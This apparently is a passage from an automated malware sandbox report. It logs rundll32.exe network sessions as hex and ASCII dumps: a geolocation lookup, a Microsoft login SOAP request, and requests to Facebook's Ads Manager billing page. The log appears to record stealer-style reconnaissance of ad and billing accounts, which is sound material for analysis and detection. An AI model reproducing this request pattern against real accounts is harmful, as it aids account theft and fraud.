                                                                                                                                                                                    2023-01-05 08:00:35 UTC20012INData Raw: 65 47 48 55 4d 51 57 37 4e 71 61 56 51 44 52 6a 32 4d 36 42 67 32 75 75 50 6c 71 6b 4d 55 47 30 52 7a 6b 31 6c 33 71 6f 69 45 7a 53 64 50 51 57 4c 53 31 56 63 65 66 53 32 4c 77 48 56 62 6b 75 64 35 31 71 70 32 37 72 72 73 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 33 47 51 6a 61 6c 79 2d 52 4a 55 69 69 61 7a 65 47 48 55 4d 51 57 37 4e 71 61 56 51 44 52 6a 32 4d 36 42 67 32 75 75 50 6c 71 6b 4d 55 47 30 52 7a 6b 31 6c 33 71 6f 69 45 7a 53 64 50 51 57 4c 53 31 56 63 65 66 53 32 4c 77 48 56 62 6b 75 64 35 31 71 70 32 37 72 72 73 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b
                                                                                                                                                                                    Data Ascii: eGHUMQW7NqaVQDRj2M6Bg2uuPlqkMUG0Rzk1l3qoiEzSdPQWLS1VcefS2LwHVbkud51qp27rrs"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa3GQjaly-RJUiiazeGHUMQW7NqaVQDRj2M6Bg2uuPlqkMUG0Rzk1l3qoiEzSdPQWLS1VcefS2LwHVbkud51qp27rrs"]},-1],["cr:1083117",[],{
                                                                                                                                                                                    2023-01-05 08:00:35 UTC20014INData Raw: 67 6a 6a 41 32 4e 5f 38 31 51 49 51 44 46 35 51 73 47 30 36 58 30 72 5a 35 50 42 69 75 66 6a 41 32 51 43 77 75 67 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65
                                                                                                                                                                                    Data Ascii: gjjA2N_81QIQDF5QsG06X0rZ5PBiufjA2QCwugw"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_e
                                                                                                                                                                                    2023-01-05 08:00:35 UTC20015INData Raw: 78 7a 6c 2d 6a 37 64 59 54 4d 2d 67 6a 6a 41 32 4e 5f 38 31 51 49 51 44 46 35 51 73 47 30 36 58 30 72 5a 35 50 42 69 75 66 6a 41 32 51 43 77 75 67 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 32 54 41 45 77 50 44 54 5a 61 4a 71 4f 75 4a 4f 71 6b 51 46 32 6c 54 75 4c 50 42 32 6e 4d 78 7a 6c 2d 6a 37 64 59 54 4d 2d 67 6a 6a 41 32 4e 5f 38 31 51 49 51 44 46 35 51 73 47 30 36 58 30 72 5a 35 50 42 69 75 66 6a 41 32 51 43 77 75 67 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 35 32 37 38 22 2c 5b 22 52 65 61 63 74 44 4f 0d 0a 66 37 32 0d 0a 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 2c 22 41 61
                                                                                                                                                                                    Data Ascii: xzl-j7dYTM-gjjA2N_81QIQDF5QsG06X0rZ5PBiufjA2QCwugw"]},-1],["cr:983844",[],{__rc:[null,"Aa2TAEwPDTZaJqOuJOqkQF2lTuLPB2nMxzl-j7dYTM-gjjA2N_81QIQDF5QsG06X0rZ5PBiufjA2QCwugw"]},-1],["cr:5278",["ReactDOf72M-prod.classic"],{__rc:["ReactDOM-prod.classic","Aa
                                                                                                                                                                                    2023-01-05 08:00:35 UTC20017INData Raw: 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 33 47 51 6a 61 6c 79 2d 52 4a 55 69 69 61 7a 65 47 48 55 4d 51 57 37 4e 71 61 56 51 44 52 6a 32 4d 36 42 67 32 75 75 50 6c 71 6b 4d 55 47 30 52 7a 6b 31 6c 33 71 6f 69 45 7a 53 64 50 51 57 4c 53 31 56 63 65 66 53 32 4c 77 48 56 62 6b 75 64 35 31 71 70 32 37 72 72 73 22 5d 7d 2c 2d 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 42 44 43 6c 69 65 6e 74 53 69 67 6e 61 6c 43 6f 6c 6c 65 63 74 69 6f 6e 54 72
                                                                                                                                                                                    Data Ascii: cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa3GQjaly-RJUiiazeGHUMQW7NqaVQDRj2M6Bg2uuPlqkMUG0Rzk1l3qoiEzSdPQWLS1VcefS2LwHVbkud51qp27rrs"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["BDClientSignalCollectionTr
                                                                                                                                                                                    2023-01-05 08:00:35 UTC20018INData Raw: 74 72 76 53 4a 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 74 72 75 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 73 62 22 2c 22 6f 6f 4f 32 59 7a 38 6a 34 64 52 4b 30 70 37 6e 73 72 36 6c 4a 32 6c 45 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 5d 7d 2c 68 73 72 70 3a 7b 68 73 64 70 3a 7b 63 6c 70 44 61 74 61 3a 7b 22 31 37 34 33 30 39 35 22 3a 7b 72 3a 31 2c 73 3a 31 7d 2c 22 31 38 37 31 36 39 37 22 3a 7b 72 3a 31 2c 73 3a 31 7d 2c 22 31 38 32 39 33 31 39 22 3a 7b 72 3a 31 7d 2c 22 31 38 32 39 33 32 30 22 3a 7b 72 3a 31 7d 2c 22 31 38 34 33 39 38 38 22 3a 7b 72 3a
                                                                                                                                                                                    Data Ascii: trvSJ",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","ooO2Yz8j4dRK0p7nsr6lJ2lE",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:
                                                                                                                                                                                    2023-01-05 08:00:35 UTC20019INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    72192.168.2.450770162.0.217.254443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 08:01:03 UTC20019OUTGET /geo.json HTTP/1.1
                                                                                                                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                                                                                                                    Host: api.2ip.ua
                                                                                                                                                                                    2023-01-05 08:01:03 UTC20019INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 08:01:03 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block; report=...
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                    2023-01-05 08:01:03 UTC20020INData Raw: 31 66 30 0d 0a 7b 22 69 70 22 3a 22 38 34 2e 31 37 2e 35 32 2e 38 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 43 48 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 38 5c 75 30 34 33 32 5c 75 30 34 33 35 5c 75 30 34 33 39 5c 75 30 34 34 36 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 38 5c 75 30 34 33 32 5c 75 30 34 33 35 5c 75 30 34 33 39 5c 75 30 34 34 36 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 35 36 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 75 72 69 63 68 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 32 36 5c 75 30 34 34 65 5c 75
                                                                                                                                                                                    Data Ascii: 1f0{"ip":"84.17.52.8","country_code":"CH","country":"Switzerland","country_rus":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0438\u044f","country_ua":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0456\u044f","region":"Zurich","region_rus":"\u0426\u044e\u


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    73192.168.2.45082740.126.32.67443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 08:01:15 UTC20020OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 4702
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 08:01:15 UTC20021OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 08:01:16 UTC20025INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 08:00:16 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: 24600ffd-f0a2-43ee-b003-b3d1b0eb9862
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02PF693965E31 V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 08:01:15 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 10857
                                                                                                                                                                                    2023-01-05 08:01:16 UTC20026INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    74192.168.2.450834157.240.195.35443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 08:01:24 UTC20036OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                    Host: www.facebook.com
                                                                                                                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
                                                                                                                                                                                    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    sec-ch-prefers-color-scheme: light
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    2023-01-05 08:01:24 UTC20037INHTTP/1.1 302 Found
                                                                                                                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                                                                    x-fb-rlafr: 0
                                                                                                                                                                                    content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                                                                    2023-01-05 08:01:24 UTC20039INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                                                                    Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    75192.168.2.450835157.240.195.35443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20041OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                    Host: www.facebook.com
                                                                                                                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
                                                                                                                                                                                    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    sec-ch-prefers-color-scheme: light
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20041INHTTP/1.1 200 OK
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                                                                    x-fb-rlafr: 0
                                                                                                                                                                                    content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20043INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                                                                    Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20044INData Raw: 64 30 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 70 76 31 45 34 43 4a 64 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                                                                                                                    Data Ascii: d039<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="pv1E4CJd">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20046INData Raw: 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 63 65 62 6f 6f 6b 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68
                                                                                                                                                                                    Data Ascii: name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" h
